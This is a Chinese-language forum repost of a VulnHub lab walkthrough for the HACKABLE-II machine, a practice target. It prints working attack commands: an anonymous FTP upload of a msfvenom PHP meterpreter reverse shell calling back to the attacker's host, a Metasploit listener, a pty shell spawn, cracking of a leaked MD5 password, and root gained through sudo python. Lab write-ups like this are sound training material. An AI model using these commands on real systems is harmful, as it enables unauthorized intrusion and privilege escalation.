ToB企服应用市场:ToB评测及商务社交产业平台

标题: 『vulnhub系列』HACKABLE-II [打印本页]

作者: 玛卡巴卡的卡巴卡玛    时间: 2024-6-6 13:56
标题: 『vulnhub系列』HACKABLE-II
『vulnhub系列』HACKABLE-II

下载地点:
  1. https://www.vulnhub.com/entry/hackable-ii,711/
复制代码
信息搜集:

利用nmap探测存活主机,发现主机开启了21,22和80端口

访问80端口的web服务,发现apache默认页面

利用dirsearch举行目录爆破,发现files 目录
  1. dirsearch -u "http://192.168.199.135/"
复制代码

访问files 页面发现CALL.html

访问CALL.html发现只有一段话

这条路的线索临时断了,我们利用匿名登录ftp,发现CALL.html
  1. ftp 192.168.199.135
  2. #使用anonymous登录,密码为空
复制代码

get之后发现就是我们刚刚在files中发现的CALL.html

毛病利用:

此时我们上传反弹shell(利用msfvenom天生)
  1. msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.199.129 lport=4444 -o re_shell.php
  2. #生成反弹shell
  3. put re_shell.php
  4. #上传反弹shell
复制代码

进入files文件,发现我们刚刚上传的re_shell.php

我们利用msfconsole举行监听
  1. msfconsole
  2. use exploit/multi/handler
  3. set lhost 192.168.199.129
  4. set payload php/meterpreter/reverse_tcp
  5. run
复制代码

开启监听后,访问re_shell.php ,反弹乐成

进入shell,利用python开启交互式shell
  1. python3 -c "import pty;pty.spawn('/bin/bash')"
复制代码
提升权限:

我们在/home中发现了important.txt ,读取发现“运行脚本发现数据”

读取/.runme.sh 发现secret key trolled 还有下面的shrek:cf4c2232354952690368f1b3dfdfb24d

利用md5解密得到密码onion

切换sherk,利用密码onion,登陆乐成

获得user.txt

利用sudo -l 查看当前用户可以以root权限执行的命令,发现python命令可以以root权限提权

此时我们利用python 举行提权,乐成
  1. sudo python3.5 -c 'import os;os.system("/bin/bash");'
复制代码

得到root.txt


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4